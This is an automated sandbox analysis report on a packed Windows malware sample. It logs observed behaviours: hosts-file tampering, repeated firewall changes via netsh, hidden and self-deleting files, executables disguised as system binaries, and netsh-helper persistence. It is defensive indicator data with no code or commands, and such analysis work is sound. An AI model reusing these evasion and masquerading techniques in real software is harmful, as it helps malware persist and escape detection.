Malware Analysis Report

2024-12-07 14:39

Sample ID 241012-r5s5bazgjr
Target 0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N
SHA256 0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0
Tags
defense_evasion discovery evasion exploit persistence privilege_escalation upx
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0

Threat Level: Likely malicious

The file 0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N was found to be: Likely malicious.

Malicious Activity Summary

defense_evasion discovery evasion exploit persistence privilege_escalation upx

Modifies Windows Firewall

Possible privilege escalation attempt

Sets file to hidden

Drops file in Drivers directory

Executes dropped EXE

Loads dropped DLL

Modifies file permissions

Deletes itself

Indicator Removal: File Deletion

UPX packed file

Drops file in Windows directory

Drops file in Program Files directory

Launches sc.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Runs net.exe

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-12 14:46

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-12 14:46

Reported

2024-10-12 14:49

Platform

win7-20240903-en

Max time kernel

118s

Max time network

26s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe"

Signatures

Drops file in Drivers directory

Description Indicator Process Target
File created \??\c:\windows\system32\drivers\etc\hosts C:\Windows\Fonts\banbecud\Wscntfy.exe N/A
File created \??\c:\windows\system32\drivers\etc\hosts_bak C:\Windows\Fonts\banbecud\Wscntfy.exe N/A
File opened for modification \??\c:\windows\system32\drivers\etc\hosts_bak C:\Windows\Fonts\banbecud\Wscntfy.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe N/A

Indicator Removal: File Deletion

defense_evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\common files\system\wk.ini C:\Windows\system32\attrib.exe N/A
File created C:\Program Files\common files\system\jk.ini C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe N/A
File opened for modification C:\Program Files\common files\system\jk.ini C:\Windows\system32\attrib.exe N/A
File created C:\Program Files\ls.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\jakbpcjd C:\Windows\system32\attrib.exe N/A
File created C:\Program Files\common files\system\wk.ini C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Fonts\banbecud\Wscntfy.exe C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe N/A
File opened for modification C:\Windows\Fonts\banbecud C:\Windows\system32\attrib.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Fonts\banbecud\Wscntfy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
